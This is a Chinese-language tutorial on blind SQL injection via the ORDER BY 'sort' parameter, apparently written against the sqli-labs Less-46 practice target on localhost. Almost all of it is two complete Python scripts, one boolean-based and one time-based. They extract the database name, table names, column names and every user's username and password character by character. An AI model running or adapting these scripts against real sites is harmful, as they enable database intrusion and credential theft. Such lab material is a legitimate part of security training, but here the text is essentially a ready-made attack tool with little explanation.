order by布尔盲注、时间盲注
pdo防御下,order by、limit不能参数绑定,可以进行sql注入
案例:靶场的less-46
布尔盲注:
import requests
from lxml import html
def get_id_one(URL, paload):
res = requests.get(url=URL, params=paload)
tree = html.fromstring(res.content)
id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
return id_one
def get_database(URL):
s = ""
for i in range(1, 10):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr(database(),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("数据库名称:" + s)
def get_table(URL):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("表的名称:" + s)
def get_column(URL):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("列的名称:" + s)
def get_result(URl):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
id_one = get_id_one(URL, paload)
if id_one == "1":
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("用户名及密码信息:" + s)
if __name__ == '__main__':
URL = "http://localhost/Less-46/"
# get_database(URL)
# get_table(URL)
# get_column(URL)
get_result(URL) 
时间盲注:
import requests
import datetime
def get_database(URL):
s = ""
for i in range(1, 10):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr(database(),{i},1))>{mid}),sleep(0.2),id) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
# print(chr(mid), mid)
s += chr(mid)
print("数据库名称:" + s)
def get_table(URL):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("表的名称:" + s)
def get_column(URL):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("列的名称:" + s)
def get_result(URl):
s = ""
for i in range(1, 32):
low = 32
hight = 128
mid = (low + hight) // 2
while (hight > low):
paload = {
"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),id) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=paload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + hight) // 2
else:
hight = mid
mid = (low + hight) // 2
s += chr(mid)
print("用户名及密码信息:" + s)
if __name__ == '__main__':
URL = "http://localhost/Less-46/"
# get_database(URL)
# get_table(URL)
# get_column(URL)
get_result(URL)